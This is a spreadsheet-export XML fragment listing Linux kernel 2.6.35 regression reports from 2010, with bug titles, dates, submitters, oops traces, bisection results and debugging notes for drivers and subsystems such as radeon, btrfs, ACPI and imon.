  <si>
    <t>2010-06-28 17:30 UTC</t>
  </si>
  <si>
    <t>Robert Nelson</t>
  </si>
  <si>
    <t>2010-08-29 22:55 UTC</t>
  </si>
  <si>
    <t>Between 2.6.35-rc1 to 2.6.35-rc3 external kernel modules stopped loading. Started a Bisected between 2.6.35-rc1 (good) and 2.6.35-rc2 (bad)... Stopped at commit: d0679c730395d0bde9a46939e7ba255b4ba7dd7c, which was merged after rc1 Merge: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1f73897861b8ef0be64ff4b801f8d6f830f683b5 Commit: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=d0679c730395d0bde9a46939e7ba255b4ba7dd7c Debian Squeeze voodoo@beagle-256mb-1:~$ gcc --version gcc (Debian 4.4.4-5) 4.4.4 2.6.35-rc3: voodoo@beagle-256mb-1:~$ lsmod Module Size Used by voodoo@beagle-256mb-1:~$ sudo modprobe asix [ 36.665161] asix: unknown relocation: 3 FATAL: Error inserting asix (/lib/modules/2.6.35-rc3-d1/kernel/drivers/net/usb/asix.ko): Invalid module format 2.6.35-rc3 with "d0679c730395d0bde9a46939e7ba255b4ba7dd7c" reverted: voodoo@beagle-256mb-1:~$ lsmod Module Size Used by asix 12870 0 mailbox_mach 4323 0 rtc_twl 4375 0 mailbox 3473 1 mailbox_mach rtc_core 13385 1 rtc_twl Looks like arm needs the same patch as powerpc.. Regards,</t>
  </si>
  <si>
    <t>WARNING: at fs/fs-writeback.c:1127 __mark_inode_dirty</t>
  </si>
  <si>
    <t>2010-06-28 17:47 UTC</t>
  </si>
  <si>
    <t>2011-01-23 16:09 UTC</t>
  </si>
  <si>
    <t>16122 17461</t>
  </si>
  <si>
    <t>Subject : WARNING: at fs/fs-writeback.c:1127 __mark_inode_dirty Submitter : Zdenek Kabelac &lt;zdenek.kabelac@gmail.com&gt; Date : 2010-06-28 9:40 Message-ID : AANLkTin24fr5O4_q5Xbo9Y_NKkEmtcp6Hgmr9_4qXaFz@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127771804806465&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at /arch/x86/include/asm/processor.h:1005 read_measured_perf_ctrs+0x5a/0x70()</t>
  </si>
  <si>
    <t>2010-07-01 13:54 UTC</t>
  </si>
  <si>
    <t>2010-10-03 21:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 26987 [details] kernel .config While booting an up2date kernel from git i get the following warning: [ 1.604263] ------------[ cut here ]------------ [ 1.604270] WARNING: at /home/files/src/git-repos/linux-2.6-t3R/arch/x86/include/asm/processor.h:1005 read_measured_perf_ctrs+0x5a/0x70() [ 1.604272] Hardware name: P5K [ 1.604273] Modules linked in: [ 1.604277] Pid: 521, comm: kondemand/2 Not tainted 2.6.35-rc3-v2k11+-testing-00336-g980019d-dirty #160 [ 1.604279] Call Trace: [ 1.604284] [&lt;ffffffff8103c04a&gt;] warn_slowpath_common+0x7a/0xb0 [ 1.604288] [&lt;ffffffff8101a330&gt;] ? read_measured_perf_ctrs+0x0/0x70 [ 1.604291] [&lt;ffffffff8103c095&gt;] warn_slowpath_null+0x15/0x20 [ 1.604294] [&lt;ffffffff8101a38a&gt;] read_measured_perf_ctrs+0x5a/0x70 [ 1.604298] [&lt;ffffffff81066fc3&gt;] smp_call_function_single+0x83/0x170 [ 1.604301] [&lt;ffffffff8101a2b7&gt;] cpufreq_get_measured_perf+0x27/0xa0 [ 1.604305] [&lt;ffffffff81435379&gt;] __cpufreq_driver_getavg+0x59/0x80 [ 1.604309] [&lt;ffffffff81437284&gt;] do_dbs_timer+0xf4/0x3a0 [ 1.604312] [&lt;ffffffff81437190&gt;] ? do_dbs_timer+0x0/0x3a0 [ 1.604315] [&lt;ffffffff8104fc71&gt;] worker_thread+0x161/0x240 [ 1.604319] [&lt;ffffffff810541f0&gt;] ? autoremove_wake_function+0x0/0x40 [ 1.604322] [&lt;ffffffff8104fb10&gt;] ? worker_thread+0x0/0x240 [ 1.604325] [&lt;ffffffff81053d5e&gt;] kthread+0x8e/0xa0 [ 1.604329] [&lt;ffffffff81003154&gt;] kernel_thread_helper+0x4/0x10 [ 1.604332] [&lt;ffffffff81053cd0&gt;] ? kthread+0x0/0xa0 [ 1.604336] [&lt;ffffffff81003150&gt;] ? kernel_thread_helper+0x0/0x10 [ 1.604338] ---[ end trace f6ca9c5ff403e784 ]--- If you need more infos please tell me what you need. If i need to enable more debug stuff inside my kernel, tell me what to include!</t>
  </si>
  <si>
    <t>2.6.35-rc3-git4 - kernel/sched.c:616 invoked rcu_dereference_check() without protection!</t>
  </si>
  <si>
    <t>2.6.35-rc3-git4</t>
  </si>
  <si>
    <t>2010-07-01 18:16 UTC</t>
  </si>
  <si>
    <t>2010-09-09 18:53 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc3-git4 - kernel/sched.c:616 invoked rcu_dereference_check() without protection! Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-07-01 12:21 Message-ID : AANLkTini6hz2LFeZi8CMUmY3xw1MU7NxmyesuxZ4oCdo@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127798693125541&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops while running fs_racer test on a POWER6 box against latest git</t>
  </si>
  <si>
    <t>2010-07-01 18:24 UTC</t>
  </si>
  <si>
    <t>2010-07-09 21:18 UTC</t>
  </si>
  <si>
    <t>Subject : Oops while running fs_racer test on a POWER6 box against latest git Submitter : divya &lt;dipraksh@linux.vnet.ibm.com&gt; Date : 2010-06-30 11:34 Message-ID : 4C2B28F3.7000006@linux.vnet.ibm.com References : http://marc.info/?l=linux-kernel&amp;m=127789697303061&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Dynamic Debug broken on 2.6.35-rc3?</t>
  </si>
  <si>
    <t>2010-07-03 11:24 UTC</t>
  </si>
  <si>
    <t>2010-07-23 11:19 UTC</t>
  </si>
  <si>
    <t>Subject : Dynamic Debug broken on 2.6.35-rc3? Submitter : Thomas Renninger &lt;trenn@suse.de&gt; Date : 2010-07-01 15:44 Message-ID : 201007011744.19564.trenn@suse.de References : http://marc.info/?l=linux-kernel&amp;m=127799907218877&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel crashes in tty code (tty_open)</t>
  </si>
  <si>
    <t>2010-07-03 18:19 UTC</t>
  </si>
  <si>
    <t>2010-07-24 22:49 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc2,3 -- Problem with PS2 keyboard and mouse driver Submitter : werner@guyane.yi.org Date : 2010-07-02 3:34 Message-ID : 1278041650.12788@guyane.yi.org References : http://marc.info/?l=linux-kernel&amp;m=127804167511930&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>X:2252 conflicting memory types 40000000-48000000 uncached-minus&lt;-&gt;write-combining</t>
  </si>
  <si>
    <t>2010-07-03 18:49 UTC</t>
  </si>
  <si>
    <t>2010-10-28 18:41 UTC</t>
  </si>
  <si>
    <t>Subject : X:2252 conflicting memory types 40000000-48000000 uncached-minus&lt;-&gt;write-combining Submitter : "Justin P. Mattock" &lt;justinmattock@gmail.com&gt; Date : 2010-07-02 20:04 Message-ID : 4C2E464A.8090900@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127810110725529&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kswapd continuously active when doing IO</t>
  </si>
  <si>
    <t>2010-07-07 10:58 UTC</t>
  </si>
  <si>
    <t>2010-07-28 07:53 UTC</t>
  </si>
  <si>
    <t>Hi.. this bug may be related to #15193 where i attached the issue as a comment. since bug #15193 has status RESOLVED PATCH_ALREADY_AVAILABLE and not CLOSED CODE_FIX i file the situation as a new bug since the problem still exists for us. THE ISSUE: we are currently having trouble with continuously running kswapds consuming up to 100% CPU time when the system is busy doing (heavy) I/O. to reproduce (on our machines): dd if=/dev/zero of=somefile will activate all kswapds when the file reaches the size of the installed memory (our systems have 8G up to 256G). (same effect on local reiserfs and local xfs) In kernel 2.6.34 (and 2.6.35-rc3) this issue causes the system to become very very slow and unresponsive. we switched back to 2.6.34-rc6 which seems to have no issues with the same IO. what information can i provide to help fixing this issue. regards, marius tolzmann</t>
  </si>
  <si>
    <t>Various issues with imon remote control driver</t>
  </si>
  <si>
    <t>2.6.35-rc4</t>
  </si>
  <si>
    <t>2010-07-07 17:13 UTC</t>
  </si>
  <si>
    <t>2011-01-23 19:41 UTC</t>
  </si>
  <si>
    <t>Jarod Wilson (the imon driver maintainer) asked my to open a report here so that the issues are not forgotten. - There is no fallback timer if a release code is missed (i.e. remote pointed away from receiver or some other anomaly), causing a key stuck on autorepeat. The driver should inject a release code itself if there is no release/repeat code in 500ms after initial press or in 120ms after a repeat code. - No release code is sent for 0x02XXXXXX keys if pressing any other button before release, examples: example 1: hold '5', then press 'Play' once, then release '5' The 'Play' codes are relayed properly, but the release code for '5' (the 'all 0x02XXXXXX keys released' (i.e. empty HID input report) which the hardware does send properly) is wrongly interpreted as a release code for 'Play'. The driver should either release '5' when the empty report is received, or, as this is just a remote control, just inject a release code for '5' when 'Play' is pressed. example 2: hold '5', then hold '4', then release '5', then release '4' As the 0x02XXXXXX range is not completely released until after '4' is released, the zeroed bitfield is not sent until after '4', and the driver doesn't release '5' at this point anymore. The driver should've injected a release code for '5' when '4' was pressed. - imon_mce_timeout() timer function seems to access ictx-&gt;last_keycode without locking - imon_parse_press_type() tests for ictx-&gt;release_code which is in an undefined state if ktype isn't IMON_KEY_IMON - when the dpad is in keyboard mode and you hold it down to one direction, instead of autorepeat there is a constant stream of release/press events</t>
  </si>
  <si>
    <t>2.6.35 regression</t>
  </si>
  <si>
    <t>2010-07-08 15:26 UTC</t>
  </si>
  <si>
    <t>2010-07-24 22:45 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35 regression Submitter : Zeev Tarantov &lt;zeev.tarantov@gmail.com&gt; Date : 2010-07-05 13:04 Message-ID : loom.20100705T144459-919@post.gmane.org References : http://marc.info/?l=linux-kernel&amp;m=127836002702522&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc4 Graphics performance issue and freeing invalid memtype messages on boot.</t>
  </si>
  <si>
    <t>2010-07-08 15:54 UTC</t>
  </si>
  <si>
    <t>2010-07-08 23:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc4 Graphics performance issue and freeing invalid memtype messages on boot. Submitter : Andrew Hendry &lt;andrew.hendry@gmail.com&gt; Date : 2010-07-06 12:22 Message-ID : 1278418937.1949.22.camel@jaunty References : http://marc.info/?l=linux-kernel&amp;m=127841896332522&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>acpi-cpufreq fails to load (No such device) if CONFIG_SMP=n</t>
  </si>
  <si>
    <t>2.6.34.1</t>
  </si>
  <si>
    <t>2010-07-09 09:40 UTC</t>
  </si>
  <si>
    <t>Ambroz Bizjak</t>
  </si>
  <si>
    <t>2011-05-30 08:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 27053 [details] config for 2.6.33.6 After updating from 2.6.33.6 to 2.6.34.1, acpi-cpufreq no longer works. "modprobe acpi-cpufreq" gives "FATAL: Error inserting acpi_cpufreq (...): No such device". I don't get any errors in dmesg after modprobe. Also if acpi-cpufreq is linked statically, it doesn't work (cpufreq-info reports no driver). Motherboard is Intel D945GSEJT (with Atom N270 CPU).</t>
  </si>
  <si>
    <t>kernel BUG at fs/btrfs/extent-tree.c:1353</t>
  </si>
  <si>
    <t>2010-07-10 20:01 UTC</t>
  </si>
  <si>
    <t>2010-08-01 21:36 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at fs/btrfs/extent-tree.c:1353 Submitter : Johannes Hirte &lt;johannes.hirte@fem.tu-ilmenau.de&gt; Date : 2010-07-08 14:27 Message-ID : 201007081627.24654.johannes.hirte@fem.tu-ilmenau.de References : http://marc.info/?l=linux-kernel&amp;m=127859960725931&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Yet another 2.6.35 regression (AGP)?</t>
  </si>
  <si>
    <t>2010-07-12 15:28 UTC</t>
  </si>
  <si>
    <t>2010-08-04 00:28 UTC</t>
  </si>
  <si>
    <t>Subject : Yet another 2.6.35 regression (AGP)? Submitter : Woody Suwalski &lt;terraluna977@gmail.com&gt; Date : 2010-07-09 14:21 Message-ID : 4C373084.8000503@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127868797119254&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression 2.6.34-&gt;2.6.35-rc4: radeaon KMS an RS690 broken</t>
  </si>
  <si>
    <t>2010-07-12 15:51 UTC</t>
  </si>
  <si>
    <t>2010-07-23 19:38 UTC</t>
  </si>
  <si>
    <t>Subject : Regression 2.6.34-&gt;2.6.35-rc4: radeaon KMS an RS690 broken Submitter : Torsten Kaiser &lt;just.for.lkml@googlemail.com&gt; Date : 2010-07-11 19:56 Message-ID : AANLkTimkNg81yzxSHTcAa1QlTE9SYmvzL4eOTVHApWq3@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127887822407672&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>i915 drm BUG: unable to handle kernel paging request at a5e89046</t>
  </si>
  <si>
    <t>2010-07-14 16:59 UTC</t>
  </si>
  <si>
    <t>lists</t>
  </si>
  <si>
    <t>2010-10-28 23:26 UTC</t>
  </si>
  <si>
    <t>Hibernate / Thaw screen is black with artifacts on thaw. Sometimes a ABRT is shown after forced reboot. Forcing a Sync or Crash or Boot with SYSRQ does not work. Machine is not pingable. Version-Release number of selected component (if applicable): 2.6.34.1-9 How reproducible: All the time Steps to Reproduce: 1. Hibernate 2. Thaw 3. Actual results: Machine hang. Expected results: Normal thaw Additional info: Smolt: http://www.smolts.org/client/show/pub_98f6cfac-8cad-4a3d-a099-e2e2854e64c0 xorg.conf is not present BUG: unable to handle kernel paging request at a5e89046 IP: [&lt;f7f8ec27&gt;] drm_mode_getconnector+0x295/0x2b9 [drm] *pdpt = 0000000036091001 *pde = 0000000000000000 Oops: 0002 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1c.0/0000:0b:00.0/ssb0:0/ieee80211/phy0/rfkill1/uevent Modules linked in: aes_i586 aes_generic coretemp ipv6 cpufreq_ondemand acpi_cpufreq fuse uinput arc4 snd_hda_codec_idt ecb snd_hda_intel snd_hda_codec b43 snd_hwdep snd_seq snd_seq_device snd_pcm mac80211 snd_timer cfg80211 snd b44 ssb dell_laptop soundcore dell_wmi i2c_i801 iTCO_wdt snd_page_alloc iTCO_vendor_support rfkill wmi mii sdhci_pci sdhci mmc_core joydev microcode dcdbas firewire_ohci firewire_core crc_itu_t i915 drm_kms_helper drm i2c_algo_bit i2c_core video output [last unloaded: kvm] Pid: 1516, comm: Xorg Not tainted 2.6.34.1-9.fc13.i686.PAE #1 0KD882/MM061 EIP: 0060:[&lt;f7f8ec27&gt;] EFLAGS: 00013293 CPU: 1 EIP is at drm_mode_getconnector+0x295/0x2b9 [drm] EAX: f36d313b EBX: 00000001 ECX: 00000003 EDX: f36d3e7c ESI: f69d4000 EDI: f8032b74 EBP: f36d3e60 ESP: f36d3dec DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Process Xorg (pid: 1516, ti=f36d2000 task=f3df5940 task.ti=f36d2000) Stack: 000000d0 f69d7688 000a3e0c f69d4154 0000033b 00000003 00000001 f36d3e7c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [&lt;f7f85ba3&gt;] ? drm_ioctl+0x23c/0x31d [drm] [&lt;f7f8e992&gt;] ? drm_mode_getconnector+0x0/0x2b9 [drm] [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c057f0e8&gt;] ? file_has_perm+0x8c/0xa6 [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c04e485d&gt;] ? vfs_ioctl+0x2c/0x96 [&lt;f7f85967&gt;] ? drm_ioctl+0x0/0x31d [drm] [&lt;c04e4df3&gt;] ? do_vfs_ioctl+0x488/0x4c6 [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c057f38c&gt;] ? selinux_file_ioctl+0x43/0x46 [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c04e4e77&gt;] ? sys_ioctl+0x46/0x66 [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c0408cdf&gt;] ? sysenter_do_call+0x12/0x28 [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b [&lt;c04c64a7&gt;] ? get_swap_bio+0x3b/0x6b Code: 00 74 17 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 eb 05 bf f2 ff ff &lt;ff&gt; 8b 45 90 e8 a5 1f 81 c8 89 f8 8b 55 f0 65 33 15 14 00 00 00 EIP: [&lt;f7f8ec27&gt;] drm_mode_getconnector+0x295/0x2b9 [drm] SS:ESP 0068:f36d3dec CR2: 00000000a5e89046</t>
  </si>
  <si>
    <t>New PM-Code produces white screen on laptop display on startup on an radeon x700</t>
  </si>
  <si>
    <t>2010-07-14 17:57 UTC</t>
  </si>
  <si>
    <t>2010-07-23 11:27 UTC</t>
  </si>
  <si>
    <t>After the merge of the new-pm code for radeon it get an all white screen on my laptop display as soon as kms gets activated. Before the merge it worked as long as i used radeon.dynpm=1 as boot parameter (without this parameter i also get an all white screen with earlier kernels). I can work around it with an vbetool dpms off / on cycle (which uses bios routines i think), i tried all options / combinations of radeon.hw_i2c and radeon.new_pll without success. I also get an all white laptop-screen as soon as i change resolutions on my display, this also can be workaround with an vbetool dpms off / on cycle. This also happens in the non-kms-case with the xorg-driver whenever i change resolutions, in the old days i could workaround it with the MonitorLayout "LVDS, none" option, however this option is long gone. Chipset is an mobility radeon x700 pcie, pci-id is: 1002:5653 Please tell me what more information is needed. Thank you Jan Kreuzer</t>
  </si>
  <si>
    <t>BUG at arch/x86/mm/physaddr.c:5</t>
  </si>
  <si>
    <t>2.6.35-rc5</t>
  </si>
  <si>
    <t>2010-07-14 19:38 UTC</t>
  </si>
  <si>
    <t>2010-07-31 09:03 UTC</t>
  </si>
  <si>
    <t>Subject : BUG at arch/x86/mm/physaddr.c:5 Submitter : Ortwin Glück &lt;odi@odi.ch&gt; Date : 2010-07-14 6:54 Message-ID : 4C3D5F3F.7070901@odi.ch References : http://marc.info/?l=linux-kernel&amp;m=127909052705341&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/block_dev.c:765!</t>
  </si>
  <si>
    <t>2010-07-14 19:50 UTC</t>
  </si>
  <si>
    <t>2010-08-30 17:03 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at fs/block_dev.c:765! Submitter : Markus Trippelsdorf &lt;markus@trippelsdorf.de&gt; Date : 2010-07-14 13:52 Message-ID : 20100714135217.GA1797@arch.tripp.de References : http://marc.info/?l=linux-kernel&amp;m=127911564213748&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression since commit 0b28bac5aef</t>
  </si>
  <si>
    <t>2.6.35-rc4, 2.6.35-rc5</t>
  </si>
  <si>
    <t>2010-07-14 23:53 UTC</t>
  </si>
  <si>
    <t>Since the commit in the title, a kernel build on an HP Mini 110 Netbook no longer has keyboard input. The main difference is that if CONFIG_SERIO_I8042=y, the keyboard works. The faulty commit was located by bisection and has been verified by reverting the patch. Further investigation shows that the faulty hunk is diff --git a/drivers/input/serio/Kconfig b/drivers/input/serio/Kconfig index 3bfe8fa..256b9e9 100644 --- a/drivers/input/serio/Kconfig +++ b/drivers/input/serio/Kconfig @@ -22,7 +22,7 @@ config SERIO_I8042 tristate "i8042 PC Keyboard controller" if EMBEDDED || !X86 default y depends on !PARISC &amp;&amp; (!ARM || ARCH_SHARK || FOOTBRIDGE_HOST) &amp;&amp; \ - (!SUPERH || SH_CAYMAN) &amp;&amp; !M68K &amp;&amp; !BLACKFIN + (!SUPERH || SH_CAYMAN) &amp;&amp; !M68K &amp;&amp; !BLACKFIN &amp;&amp; !X86_MRST help i8042 is the chip over which the standard AT keyboard and PS/2 mouse are connected to the computer. If you use these devices, Reverting this one hunk alone results in a working system. Obviously, this Netbook does not have X86_MRST set.</t>
  </si>
  <si>
    <t>[bisected] resume from suspend freezes system</t>
  </si>
  <si>
    <t>2.6.35-rc series</t>
  </si>
  <si>
    <t>2010-07-15 02:32 UTC</t>
  </si>
  <si>
    <t>tomas m</t>
  </si>
  <si>
    <t>2012-01-12 21:27 UTC</t>
  </si>
  <si>
    <t>16311 reset_after_suspend</t>
  </si>
  <si>
    <t>bisected to commit 2a6b69765ad794389f2fc3e14a0afa1a995221c2 ACPI: Store NVS state even when entering suspend to RAM reverted commit on 2.6.35-rc5 and the system can suspend/resume correctly again im not sure what kind of hardware details i must report for this.</t>
  </si>
  <si>
    <t>perf failed with kernel 2.6.35-rc</t>
  </si>
  <si>
    <t>2010-07-15 17:29 UTC</t>
  </si>
  <si>
    <t>2010-08-30 17:06 UTC</t>
  </si>
  <si>
    <t>Subject : perf failed with kernel 2.6.35-rc Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2010-07-13 8:14 Message-ID : 1279008849.2096.913.camel@ymzhang.sh.intel.com References : http://marc.info/?l=linux-kernel&amp;m=127900880212470&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit 1ac62cfff252fb668405ef3398a1fa7f4a0d6d15 Author: Peter Zijlstra &lt;peterz@infradead.org&gt; Date: Fri Mar 26 14:08:44 2010 +0100 perf, x86: Add Nehelem PMU programming errata workaround First-Bad-Commit : 1ac62cfff252fb668405ef3398a1fa7f4a0d6d15</t>
  </si>
  <si>
    <t>2.6.35-rc5 inconsistent lock state</t>
  </si>
  <si>
    <t>2010-07-15 17:37 UTC</t>
  </si>
  <si>
    <t>2010-09-05 07:43 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc5 inconsistent lock state Submitter : Martin Pirker &lt;lkml.collector@gmail.com&gt; Date : 2010-07-14 20:33 Message-ID : AANLkTikDF0TL6OyPVCzPlUTwxFehcrETn3ysgSSeTq92@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127913961025267&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Brightness Adjustment on Toshiba nb305 Netbooks is non-functional.</t>
  </si>
  <si>
    <t>2.6.35-rc4-00131-ge467e10</t>
  </si>
  <si>
    <t>2010-07-15 23:40 UTC</t>
  </si>
  <si>
    <t>Cody P Schafer</t>
  </si>
  <si>
    <t>2010-09-12 19:00 UTC</t>
  </si>
  <si>
    <t>Overview: The fn-{brightness up, brightness down} keys on the Toshiba nb305 netbook do not adjust the brightness, nor do they generate ACPI events. Steps to reproduce: 1.) Boot kernel on a nb305. 2.) Press fn-f5 or fn-f6. Actual Results: Brightness of LVDS display stays the same. No output from acpi_listen. Expected Results: Change in the brightness of the LVDS display. Video brightness event from acpi_listen. Bisected: First bad commit: 74a365b3f354fafc537efa5867deb7a9fadbfe27 "ACPI: Populate DIDL before registering ACPI video device on Intel"</t>
  </si>
  <si>
    <t>Badness with the kernel version 2.6.35-rc1-git1 running on P6 box</t>
  </si>
  <si>
    <t>2.6.35-rc5-git1</t>
  </si>
  <si>
    <t>2010-07-17 05:51 UTC</t>
  </si>
  <si>
    <t>2010-09-08 11:25 UTC</t>
  </si>
  <si>
    <t>Subject : Badness with the kernel version 2.6.35-rc1-git1 running on P6 box Submitter : divya &lt;dipraksh@linux.vnet.ibm.com&gt; Date : 2010-07-16 8:50 Message-ID : 4C401D56.3070108@linux.vnet.ibm.com References : http://marc.info/?l=linux-kernel&amp;m=127927024906085&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Psx parallel joystick does not respond after upgrading kernel</t>
  </si>
  <si>
    <t>2010-07-18 06:06 UTC</t>
  </si>
  <si>
    <t>Eugene Yudin</t>
  </si>
  <si>
    <t>2010-07-23 11:37 UTC</t>
  </si>
  <si>
    <t>Full description: Psx parallel joystick after upgrading the kernel from version 2.6.33 to 2.6.34 ceased to respond to pressing. No error messages are not displayed in reports. Rolling back the kernel returns the joystick to work. Joystick collected under the scheme from the kernel documentation. The report in dmesg, however, remains the same: input: PSX controller as /devices/virtual/input/input4 To start the module gamecon I use this command: # modprobe gamecon map=0,7 psx_delay=3 To reproduce this error enough to do the following: 1. # modprobe gamecon map=0,7 psx_delay=3 2. $ cat /dev/input/js0 3. Output of cat: ����������������������������� ��� ��� ������������������������ This conclusion does not change when I click on any button. Kernel version: Linux version 2.6.34-ARCH (tobias@T-POWA-LX) (gcc version 4.5.0 20100610 (prerelease) (GCC) ) #1 SMP PREEMPT Mon Jul 5 21:03:38 UTC 2010 Output of ver_linux: Linux arch 2.6.34-ARCH #1 SMP PREEMPT Mon Jul 5 21:03:38 UTC 2010 i686 AMD Athlon(tm) XP 2800+ AuthenticAMD GNU/Linux Gnu C 4.5.0 Gnu make 3.81 binutils 2.20.1.20100521 util-linux 2.18 mount support module-init-tools 3.11.1 e2fsprogs 1.41.12 jfsutils 1.1.14 reiserfsprogs 3.6.21 xfsprogs 3.1.2 pcmciautils 017 PPP 2.4.5 Linux C Library 2.12 Dynamic linker (ldd) 2.12 Linux C++ Library 6.0.14 Procps 3.2.8 Net-tools 1.60 Kbd 1.15.2 Sh-utils 8.5 wireless-tools 29 Modules Loaded joydev gamecon ff_memless fuse w83627hf hwmon_vid lirc_serial lirc_dev nfs lockd fscache nfs_acl auth_rpcgss sunrpc ipv6 hid_a4tech usbhid hid snd_seq_dummy snd_seq_oss snd_wavefront snd_seq_midi_event snd_seq pl2303 snd_cs4236 snd_wss_lib snd_opl3_lib snd_hwdep snd_pcm_oss snd_ca0106 snd_ac97_codec ac97_bus snd_pcm usbserial snd_timer snd_mixer_oss snd_page_alloc nvidia fan snd_mpu401 snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore ohci_hcd analog ppdev nvidia_agp i2c_nforce2 parport_pc ns558 gameport parport ehci_hcd shpchp agpgart i2c_core usbcore sg thermal pci_hotplug evdev button processor forcedeth rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod sd_mod cdrom pata_acpi pata_amd ata_generic libata scsi_mod Modules: joydev 7503 0 - Live 0xf80d6000 gamecon 5895 0 - Live 0xf80bf000 ff_memless 3935 1 gamecon, Live 0xf8053000 fuse 51934 3 - Live 0xf8165000 w83627hf 16048 0 - Live 0xf964f000 hwmon_vid 2000 1 w83627hf, Live 0xf963f000 lirc_serial 8146 1 - Live 0xf9633000 lirc_dev 8334 3 lirc_serial, Live 0xf9624000 nfs 253248 1 - Live 0xf95cf000 lockd 58536 1 nfs, Live 0xf9564000 fscache 35391 1 nfs, Live 0xf953c000 nfs_acl 1907 1 nfs, Live 0xf9526000 auth_rpcgss 30625 1 nfs, Live 0xf9514000 sunrpc 160408 16 nfs,lockd,nfs_acl,auth_rpcgss, Live 0xf94d0000 ipv6 236510 22 - Live 0xf944f000 hid_a4tech 1752 0 - Live 0xf841e000 usbhid 32710 0 - Live 0xf843f000 hid 60015 2 hid_a4tech,usbhid, Live 0xf840d000 snd_seq_dummy 1071 0 - Live 0xf8390000 snd_seq_oss 25016 0 - Live 0xf83f8000 snd_wavefront 28397 0 - Live 0xf83d0000 snd_seq_midi_event 4488 1 snd_seq_oss, Live 0xf83be000 snd_seq 41656 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event, Live 0xf839b000 pl2303 14722 0 - Live 0xf8365000 snd_cs4236 22220 0 - Live 0xf834e000 snd_wss_lib 17636 2 snd_wavefront,snd_cs4236, Live 0xf82d7000 snd_opl3_lib 7194 2 snd_wavefront,snd_cs4236, Live 0xf829f000 snd_hwdep 4756 2 snd_wavefront,snd_opl3_lib, Live 0xf8234000 snd_pcm_oss 33474 0 - Live 0xf828d000 snd_ca0106 28330 3 - Live 0xf823c000 snd_ac97_codec 87773 1 snd_ca0106, Live 0xf8336000 ac97_bus 754 1 snd_ac97_codec, Live 0xf817d000 snd_pcm 58460 6 snd_cs4236,snd_wss_lib,snd_pcm_oss,snd_ca0106,snd_ac97_codec, Live 0xf8215000 usbserial 26886 1 pl2303, Live 0xf81b0000 snd_timer 15601 5 snd_seq,snd_wss_lib,snd_opl3_lib,snd_pcm, Live 0xf8173000 snd_mixer_oss 14328 1 snd_pcm_oss, Live 0xf813c000 